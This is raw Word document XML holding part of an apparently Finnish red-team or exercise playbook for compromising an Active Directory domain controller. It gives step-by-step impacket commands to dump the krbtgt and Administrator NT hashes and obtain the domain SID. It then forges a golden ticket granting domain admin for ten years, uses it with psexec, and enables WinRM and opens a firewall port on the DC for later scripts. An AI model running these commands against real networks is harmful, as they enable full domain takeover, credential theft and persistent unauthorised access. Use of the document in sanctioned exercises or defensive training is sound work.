          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[filename]</w:t>
      </w:r>
      <w:r w:rsidR="00421FF7">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> "[domain]/administrator@[</w:t>
      </w:r>
      <w:r w:rsidR="00C5129F">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>]"</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD039B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA95176" w14:textId="53A6E7B2" w:rsidR="0063656C" w:rsidRPr="00FD039B" w:rsidRDefault="0063656C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/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45136A9C" w14:textId="41A800DD" w:rsidR="0063656C" w:rsidRDefault="0063656C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  <w:r w:rsidRPr="00EC5F91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Komento saattaa päättyä virheeseen. Jos näin käy aja komento uudestaan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6535FC78" w14:textId="63236DCB" w:rsidR="00EC5F91" w:rsidRDefault="00EC5F91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</w:p>
    <w:p w14:paraId="6137FBA8" w14:textId="78A3838B" w:rsidR="00EC5F91" w:rsidRPr="00EC5F91" w:rsidRDefault="00EC5F91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  <w:r w:rsidRPr="00EC5F91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Kerberos ticketin principal name tulee olla oikein</w:t>
      </w:r>
      <w:r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, muuten komento ei mene läpi!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74997AB5" w14:textId="3F0556D5" w:rsidR="00EC5F91" w:rsidRPr="00EC5F91" w:rsidRDefault="00EC5F91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u w:val="single"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AE10491" w14:textId="6DEED618" w:rsidR="00EC5F91" w:rsidRDefault="00EC5F91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u w:val="single"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC5F91">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A89C19E" wp14:editId="11CEB2A4">
            <wp:extent cx="5714999" cy="2071688"/>
            <wp:effectExtent l="0" t="0" r="635" b="508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837" cy="20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1BF" w14:textId="3485167B" w:rsidR="00FD039B" w:rsidRDefault="00FD039B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u w:val="single"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70BC3D87" w14:textId="37FBF6B4" w:rsidR="00FD039B" w:rsidRDefault="00E5529A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  <w:r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Ota tulosteesta talteen </w:t>
      </w:r>
      <w:r w:rsidR="003C4166" w:rsidRPr="003C4166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krbtgt</w:t>
      </w:r>
      <w:r w:rsidR="003C4166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 </w:t>
      </w:r>
      <w:r w:rsidR="00B26CCD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ja Administrator </w:t>
      </w:r>
      <w:r w:rsidR="003C4166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tunnuksen </w:t>
      </w:r>
      <w:r w:rsidR="000A540A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NT</w:t>
      </w:r>
      <w:r w:rsidR="003C4166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hash</w:t>
      </w:r>
      <w:r w:rsidR="000A540A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. </w:t>
      </w:r>
      <w:r w:rsidR="007E1EE6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Näitä</w:t>
      </w:r>
      <w:r w:rsidR="000A540A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 tarvitaan seuraav</w:t>
      </w:r>
      <w:r w:rsidR="007E1EE6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issa</w:t>
      </w:r>
      <w:r w:rsidR="000A540A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 stepissä.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C2A3AE" w14:textId="77777777" w:rsidR="00C80C1D" w:rsidRDefault="00C80C1D" w:rsidP="00C80C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</w:p>
    <w:p w14:paraId="04001843" w14:textId="7330F20C" w:rsidR="00C80C1D" w:rsidRPr="00E5529A" w:rsidRDefault="00C80C1D" w:rsidP="00C80C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  <w:r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Tämän tulosteen voi julkaista someen tms. kun WT antaa luvan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58341907" w14:textId="77777777" w:rsidR="00C80C1D" w:rsidRDefault="00C80C1D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</w:p>
    <w:p w14:paraId="00F6707C" w14:textId="0946021E" w:rsidR="00AD31A2" w:rsidRDefault="00AD31A2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</w:p>
    <w:p w14:paraId="5DCBEDCC" w14:textId="788E601E" w:rsidR="00AD31A2" w:rsidRDefault="00B26CCD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  <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12EC419B" wp14:editId="3DB7C629">
            <wp:extent cx="5863431" cy="79057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75" cy="7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B6ED" w14:textId="58293F51" w:rsidR="000A540A" w:rsidRDefault="000A540A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</w:p>
    <w:p w14:paraId="416EF804" w14:textId="201403CB" w:rsidR="00706469" w:rsidRDefault="00706469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  <w:r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 xml:space="preserve">Dumppaaminen jos </w:t>
      </w:r>
      <w:r w:rsidR="00362D24"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  <w:t>hallussa sopiva kerberos tiketti</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE24116" w14:textId="77777777" w:rsidR="00362D24" w:rsidRDefault="00362D24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D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E626FF6" w14:textId="557BEDE1" w:rsidR="005735DD" w:rsidRPr="00D35BD0" w:rsidRDefault="005735DD" w:rsidP="005735DD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/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r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>impacket-secretsdump -k</w:t>
      </w:r>
      <w:r w:rsidR="00D35BD0"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 xml:space="preserve"> -no-pass</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> -outputfile </w:t>
      </w:r>
      <w:r w:rsidRPr="00D35BD0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r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>[filename]</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35BD0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9405E"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>"</w:t>
      </w:r>
      <w:r w:rsidR="00D35BD0"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>[dc].</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35BD0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>[domain]"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35BD0">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cs="Segoe UI"/>
          <w:color w:val="0D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62756B20" w14:textId="77777777" w:rsidR="009D2A25" w:rsidRPr="00362D24" w:rsidRDefault="009D2A25" w:rsidP="009D2A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D004C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC78E98" w14:textId="0F765D64" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc131534302"/>
      <w:r>
        <w:t>BP - DC - Credential Access - Steal or Forge Kerberos Tickets Golden Ticket</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4AE985D7" w14:textId="7BC07200" w:rsidR="00AD31A2" w:rsidRDefault="00AD31A2" w:rsidP="00AD31A2"/>
    <w:p w14:paraId="20E27598" w14:textId="78CE48D0" w:rsidR="00AD31A2" w:rsidRDefault="00AD31A2" w:rsidP="00AD31A2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0D004C"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD31A2">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Tikettiä varten tarvitaan </w:t>
      </w:r>
      <w:r w:rsidRPr="003C4166">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0D004C"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0D004C"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> tunnuksen </w:t>
      </w:r>
      <w:r w:rsidR="001266C2">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="0D004C"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>nthash, sekä domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC423C" w14:textId="11C6BDD6" w:rsidR="001266C2" w:rsidRDefault="005B594E" w:rsidP="00AD31A2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r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>impacket-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 xml:space="preserve">getPac -targetUser [compromised user] </w:t>
      </w:r>
      <w:r w:rsidR="00400752">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>[domain]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/[compromised username]:[compromised password]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D7E68" w14:textId="3FB639F9" w:rsidR="00C27A35" w:rsidRDefault="00C27A35" w:rsidP="00AD31A2">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C27A35">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CDAECB5" wp14:editId="316D0605">
            <wp:extent cx="5525588" cy="93345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297" cy="9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D88E" w14:textId="410E24A6" w:rsidR="00D41DFB" w:rsidRDefault="00C27A35" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C59E6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Po</w:t>
      </w:r>
      <w:r w:rsidR="00C80C1D">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="007C59E6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">mi tulosteen lopusta </w:t>
      </w:r>
      <w:r w:rsidR="007C59E6" w:rsidRPr="007C59E6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Domain S</w:t>
      </w:r>
      <w:r w:rsidR="007C59E6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01835080" w14:textId="0EC01225" w:rsidR="007C59E6" w:rsidRDefault="007C59E6" w:rsidP="00D41DFB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32732772" wp14:editId="1FA4C256">
            <wp:extent cx="4601357" cy="10477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81" cy="10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D20E" w14:textId="4230D170" w:rsidR="007C59E6" w:rsidRPr="00EE3B87" w:rsidRDefault="1EBBC1D5" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Luodaan lopuksi tiketti, joka antaa </w:t>
      </w:r>
      <w:r w:rsidR="52759ABF" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>halutulle</w:t>
      </w:r>
      <w:r w:rsidR="2E4425D0" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> käyttäjälle domain admin oikeudet kymmeneksi vuodeksi</w:t>
      </w:r>
      <w:r w:rsidR="6D64AC06" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0E2E7086" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Voidaan käyttää vuodettua käyttäjää tai mitä tahansa edellisen vaiheen crendentia</w:t>
      </w:r>
      <w:r w:rsidR="711C437B" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="0E2E7086" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> dumbissa löydettyä käyttäjää</w:t>
      </w:r>
      <w:r w:rsidR="5C26E81E" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="46614E96" w:rsidRPr="10872EA9">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>tai sitten käyttäjää, jota ei ole edes olemassa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FA35EF" w14:textId="525D89D8" w:rsidR="00CB2670" w:rsidRDefault="00ED305E" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C5129F"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>impacket-ticketer -nthash [nthash of krbtgt account] -domain-sid [domain-sid] -domain [domain] [</w:t>
      </w:r>
      <w:r w:rsidR="008D50D2" w:rsidRPr="00C5129F"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>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5129F"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>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E80CEC5" w14:textId="10529911" w:rsidR="00ED305E" w:rsidRDefault="004300AA" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004300AA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B124188" wp14:editId="77DDBAC2">
            <wp:extent cx="6012279" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="762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071" cy="19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09A3" w14:textId="77777777" w:rsidR="00596770" w:rsidRDefault="00157F0B" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Tiketin käyttöönotto ja testaus</w:t>
      </w:r>
      <w:r w:rsidR="00596770">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC6ECEE" w14:textId="2750B3D4" w:rsidR="004300AA" w:rsidRDefault="004300AA" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00444113">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E9B6D09" wp14:editId="10801D5D">
            <wp:extent cx="5121601" cy="13906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10" cy="13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A567" w14:textId="4F14D953" w:rsidR="0050145B" w:rsidRDefault="0050145B" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE2192F" w14:textId="54AC48EF" w:rsidR="00FD766E" w:rsidRDefault="00FD766E" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F0D02">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Huom. </w:t>
      </w:r>
      <w:r w:rsidR="009F0D02" w:rsidRPr="009F0D02">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Impacket-psexec komennossa t</w:t>
      </w:r>
      <w:r w:rsidR="009F0D02">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">ulee olla määriteltynä DC-kone tai mikä tahansa muu </w:t>
      </w:r>
      <w:r w:rsidR="009A63FA">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>kone,</w:t>
      </w:r>
      <w:r w:rsidR="009F0D02">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> johon halutaan yhdistää</w:t>
      </w:r>
      <w:r w:rsidR="002B6FCF">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>. Esimerkissä yhdistetty DC-koneeseen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4435C" w14:textId="00ADE41B" w:rsidR="00274BA5" w:rsidRDefault="00274BA5" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00502B8A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="0031557F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="fi-FI"/>
          </w:rPr>
          <w:t>KRB5CCNAME=$PWD/</w:t>
        </w:r>
        <w:r w:rsidR="00B5278F" w:rsidRPr="00B5278F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="fi-FI"/>
          </w:rPr>
          <w:t>testi.ccache</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="54587EDA" w14:textId="46F37364" w:rsidR="002B6FCF" w:rsidRPr="002B6FCF" w:rsidRDefault="002B6FCF" w:rsidP="00D41DFB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r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>impacket-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psexec -k -no-pass "[domain]/[compromised user]@[computer].[domain]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF0C747" w14:textId="183F9296" w:rsidR="0050145B" w:rsidRPr="00ED305E" w:rsidRDefault="00FD766E" w:rsidP="00D41DF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763B02" wp14:editId="3134BBC9">
            <wp:extent cx="4838700" cy="47277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72" cy="47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BC66" w14:textId="45C69B03" w:rsidR="002727A6" w:rsidRDefault="002727A6" w:rsidP="002727A6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc131534303"/>
      <w:r>
        <w:t>BP - DC - Lateral Movement - Remote Services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="6F35AE5C" w14:textId="16ABE629" w:rsidR="00B5278F" w:rsidRDefault="00B5278F" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5278F">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabloidaan powershell dc koneelle. </w:t>
      </w:r>
      <w:r w:rsidRPr="00465A5E">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Tämä helpottaa</w:t>
      </w:r>
      <w:r w:rsidR="00465A5E" w:rsidRPr="00465A5E">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> viimeisten vaiheiden s</w:t>
      </w:r>
      <w:r w:rsidR="00465A5E">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>criptien ajamista</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9726F" w14:textId="2B032EAD" w:rsidR="00465A5E" w:rsidRDefault="00465A5E" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>Avaa shell yhteys dc koneelle</w:t>
      </w:r>
      <w:r w:rsidR="003839AF">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve"> ja </w:t>
      </w:r>
      <w:r w:rsidR="009A0EE6">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>aja oheinen komento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EACCB25" w14:textId="2B7F58E5" w:rsidR="009A0EE6" w:rsidRDefault="009A0EE6" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>winrm.cmd quickconfig -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279DDA10" w14:textId="77777777" w:rsidR="009A0EE6" w:rsidRDefault="005F5DF9" w:rsidP="00B5278F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47A01AF6" wp14:editId="0115BA25">
            <wp:extent cx="5416758" cy="538163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84" cy="5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84ED" w14:textId="77777777" w:rsidR="00B80571" w:rsidRDefault="009A0EE6" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t xml:space="preserve">Avataan lisäksi dc koneen palomuurin reikä </w:t>
      </w:r>
      <w:r w:rsidR="00B80571">
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
        <w:t>powershelliä varten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B063078" w14:textId="77777777" w:rsidR="00B80571" w:rsidRDefault="00B80571" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>netsh advfirewall firewall add rule name="Windows Remote Management (HTTP-ln) " dir=in action=allow protocol=TCP localport=5985</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D5B01" w14:textId="795A2277" w:rsidR="003839AF" w:rsidRPr="00BE751C" w:rsidRDefault="00B80571" w:rsidP="00B5278F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fi-FI"/>
        </w:rPr>
      </w:pPr>
      <w:r>
